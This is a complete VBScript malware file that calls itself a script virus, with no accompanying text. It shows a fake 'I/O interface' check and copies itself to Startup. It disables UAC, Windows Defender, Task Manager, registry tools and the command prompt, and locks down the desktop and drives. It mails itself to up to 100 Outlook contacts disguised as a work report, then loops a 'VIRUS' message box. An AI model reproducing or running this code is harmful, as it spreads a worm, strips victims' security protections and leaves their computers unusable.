On Error Resume Next
set fso=createobject("scripting.filesystemobject")
set vbs=wscript.createobject("wscript.shell")
pt=vbs.specialfolders("startup") & "\"
set file=fso.getfile(wscript.scriptfullname)
file.copy pt
set fso=createobject("scripting.filesystemobject")
set vbs=wscript.createobject("wscript.shell")
pt=vbs.specialfolders(1) & "\"
set file=fso.getfile(wscript.scriptfullname)
file.copy pt
set ws=wscript.createobject("wscript.shell")
ws.popup "正在驗證I/O接口...",3,"接口工具",vbinformation
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"
if err.number<>0 then
On Error Goto 0
err.raise 1,"無法匹配的I/O接口,請以ADMINISTRATOR用戶運行重試","Access failed (no permission)"
end if
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\[TARGETDIR]腳本病毒加強版.vbs","RUNASADMIN","REG_SZ"
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",0,"REG_DWORD"
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",0,"REG_DWORD"
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop",0,"REG_DWORD"
ws.run "cmd /c echo 0>C:\Windows\Web\Screen\e.bmp"
Set ol=CreateObject("Out"+"look"+".Application")
For x=1 To 100
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="工作報告"
Mail.Body="您好,這是今月的工作報告"
Mail.Attachments.Add(dir2&"Win32system.vbs")
Mail.Send
Next
ol.Quit
ws.run "cmd /c echo Your Computer Has Been Destoryed!>e.txt"
ws.run "cmd /c echo Your Computer Has Been Destoryed!>c:\e.txt"
wscript.sleep 2000
ws.regwrite "HKCU\Control Panel\Desktop\wallpaper","C:\Windows\Web\Screen\e.bmp","REG_SZ"
ws.run "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupIDPage",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupSecurityPage",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoEntireNetwork",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoWorkgroupContents",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoFileSharingControl",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoPrintSharingControl",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CLASSES_ROOT\directory\background\ShellEx\ContextMenuHandlers\New\",0,"REG_SZ"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService\Start",4,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\noclose","1","REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrivers",67108863,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent",0,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetActiveDesktop",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktopChanges",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Nodesktop",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDeletePrinter",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"
wscript.sleep 100
ws.regwrite "HKEY_CURRENT_USER\ControlPanel\Desktop\CoolSwitch",0,"REG_SZ"
wscript.sleep 100
ws.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",67108863,"REG_DWORD"
ws.run "cmd /c taskkill /f /im explorer.exe"
wscript.sleep 3000
ws.run "cmd /c start explorer.exe"
wscript.sleep 2000
ws.regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"
wscript.sleep 100
set vbs=wscript.createobject("wscript.shell")
set ws=createobject("wscript.shell")
do
msgbox"妳好",vbexclamation,"VIRUS"
wscript.sleep 5000
loop